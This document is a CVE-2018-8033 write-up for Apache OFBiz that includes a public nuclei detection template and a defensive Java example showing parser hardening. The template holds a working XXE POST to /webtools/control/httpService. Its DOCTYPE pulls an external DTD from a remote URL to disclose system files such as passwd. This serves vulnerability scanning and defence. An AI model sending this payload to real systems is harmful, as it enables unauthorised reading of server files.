In Apache OFBiz 16.11.01 to 16.11.04, the OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. Both POST and GET requests to the httpService endpoint may contain three parameters: serviceName, serviceMode, and serviceContext. The exploitation occurs by having DOCTYPEs pointing to external references that trigger a payload that returns secret information from the host.
PoC code [public]
id: CVE-2018-8033

info:
  name: Apache OFBiz - XML External Entity Injection
  author: daffainfo
  severity: high
  description: |
    In Apache OFBiz 16.11.01 to 16.11.04, the OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. Both POST and GET requests to the httpService endpoint may contain three parameters: serviceName, serviceMode, and serviceContext. The exploitation occurs by having DOCTYPEs pointing to external references that trigger a payload that returns secret information from the host.
  impact: |
    Attackers can read sensitive files or cause denial of service by exploiting XXE vulnerability.
  remediation: |
    Update to the latest version of Apache OFBiz that addresses the XXE vulnerability or apply security patches.
  reference:
    - https://lists.apache.org/thread/9bym7qk6ccwwr6d3mg26thp9zyv1l06y
    - https://nvd.nist.gov/vuln/detail/CVE-2018-8033
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-8033
    cwe-id: CWE-200
    epss-score: 0.92044
    epss-percentile: 0.99687
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: ofbiz
    shodan-query:
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve,cve2018,apache,ofbiz,xxe,vuln

http:
  - raw:
      - |
        POST /webtools/control/httpService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        serviceName=createPartyGroup&serviceMode=sync&serviceContext=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY %25 request SYSTEM 'https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/xxe-poc.dtd'>%25request;%25secondstage;]><r>%26disclose;</r>

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "FileNotFoundException:"
          - "nonexistent\\/root:.*:0:0:"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022031b25549d406cef714be9e580ff004649b79212076cbc4927eed274b36c8f8100221009e0e2633ace0922a0bfe423807ea27156c29b3e33bb3ca9b81cb2c404df84357:922c64590222798bb761d5b6d8e72950
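The defensive counterpart to the request above, as an added illustration rather than OFBiz's own code or its actual fix: the template works because the serviceContext XML is handed to a parser that honours a DOCTYPE with an external parameter entity, and the check below shows a JAXP configuration that refuses the DOCTYPE outright. The class name, the field name and the DTD host (`dtd-host.invalid`) are constructed for the example.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

public class ServiceContextXxeCheck {
    // Constructed sample with the shape of the template's serviceContext
    // value (URL-decoded); the DTD host is a placeholder, not a real server.
    static final String SERVICE_CONTEXT =
        "<?xml version=\"1.0\"?>"
        + "<!DOCTYPE foo [<!ENTITY % request SYSTEM "
        + "'http://dtd-host.invalid/xxe.dtd'>%request;]>"
        + "<r>ok</r>";

    /** Factory defaults: honours the DOCTYPE and tries to fetch the DTD. */
    static DocumentBuilder defaultParser() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    /** Hardened: refuse any DOCTYPE, and disable external entities and DTD loading. */
    static DocumentBuilder hardenedParser() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    /** Parses xml and returns null on success, or a description of the failing exception. */
    static String failureOf(DocumentBuilder db, String xml) {
        try {
            db.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return null;   // parsed: the DOCTYPE was accepted
        } catch (Exception e) {
            return e.getClass().getSimpleName() + ": " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        // Hardened: SAXParseException, the DOCTYPE is refused before any entity is touched.
        System.out.println("hardened: " + failureOf(hardenedParser(), SERVICE_CONTEXT));
        // Default: the parser goes out to fetch the DTD; here that ends in a network error.
        System.out.println("default:  " + failureOf(defaultParser(), SERVICE_CONTEXT));
    }
}
```

The disallow-doctype-decl feature alone is enough to stop this template's request; the remaining features are the usual belt-and-braces settings for parsers that must accept DTDs for other reasons.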